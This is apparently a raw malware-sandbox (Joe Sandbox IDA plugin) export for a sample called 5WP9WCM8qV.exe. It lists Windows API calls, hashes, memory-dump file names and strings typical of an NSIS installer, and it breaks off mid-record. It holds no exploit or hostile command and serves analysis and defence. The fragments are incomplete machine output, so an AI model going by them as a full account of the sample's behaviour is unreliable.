                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                        • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                        • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                        • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                        • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                        • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                        • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                        • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                        • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                        • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                        • GetSysColor.USER32(?), ref: 00404396
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                        • lstrlenW.KERNEL32(?), ref: 004043B7
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                        • SendMessageW.USER32(00000000), ref: 00404439
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                        • SetCursor.USER32(00000000), ref: 004044B8
                                        • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                        • SetCursor.USER32(00000000), ref: 004044DC
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                        • String ID: -B@$Call$N$open
                                        • API String ID: 3615053054-1446803726
                                        • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                        • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                        • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                        • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                        • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                        • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                        • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                        APIs
                                        • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                          • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                          • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                        • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                        • wsprintfA.USER32 ref: 00405DFB
                                        • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                        • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                        • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                          • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                          • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                        • String ID: %ls=%ls$NUL$[Rename]
                                        • API String ID: 222337774-899692902
                                        • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                        • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                        • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                        • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                        APIs
                                        • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                        • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                        • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                        • CharPrevW.USER32(0040A300,0040A300,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                        Strings
                                        • "C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 0040632D
                                        • *?|<>/":, xrefs: 0040633B
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-4062474357
                                        • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                        • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                        • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                        • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                        • GetSysColor.USER32(00000000), ref: 004041B9
                                        • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                        • SetBkMode.GDI32(?,?), ref: 004041D1
                                        • GetSysColor.USER32(?), ref: 004041E4
                                        • SetBkColor.GDI32(?,?), ref: 004041F4
                                        • DeleteObject.GDI32(?), ref: 0040420E
                                        • CreateBrushIndirect.GDI32(?), ref: 00404218
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                        • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                        • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                        • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                        • GetMessagePos.USER32 ref: 00404AA1
                                        • ScreenToClient.USER32(?,?), ref: 00404ABB
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                        • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                        • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                        • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                        • MulDiv.KERNEL32(0008340D,00000064,00083611), ref: 00402D4D
                                        • wsprintfW.USER32 ref: 00402D5D
                                        • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402D57
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                        • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                        • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                        • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 10002416
                                          • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                        • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                        • String ID:
                                        • API String ID: 4216380887-0
                                        • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                        • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                        • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                        • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                        APIs
                                          • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                        • GlobalFree.KERNEL32(?), ref: 10002572
                                        • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                        • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                        • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                        • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                        • GlobalFree.KERNEL32(?), ref: 004028E9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                        • CloseHandle.KERNEL32(?), ref: 00402914
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                        • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                        • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                        • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                        Strings
                                        Memory Dump Source
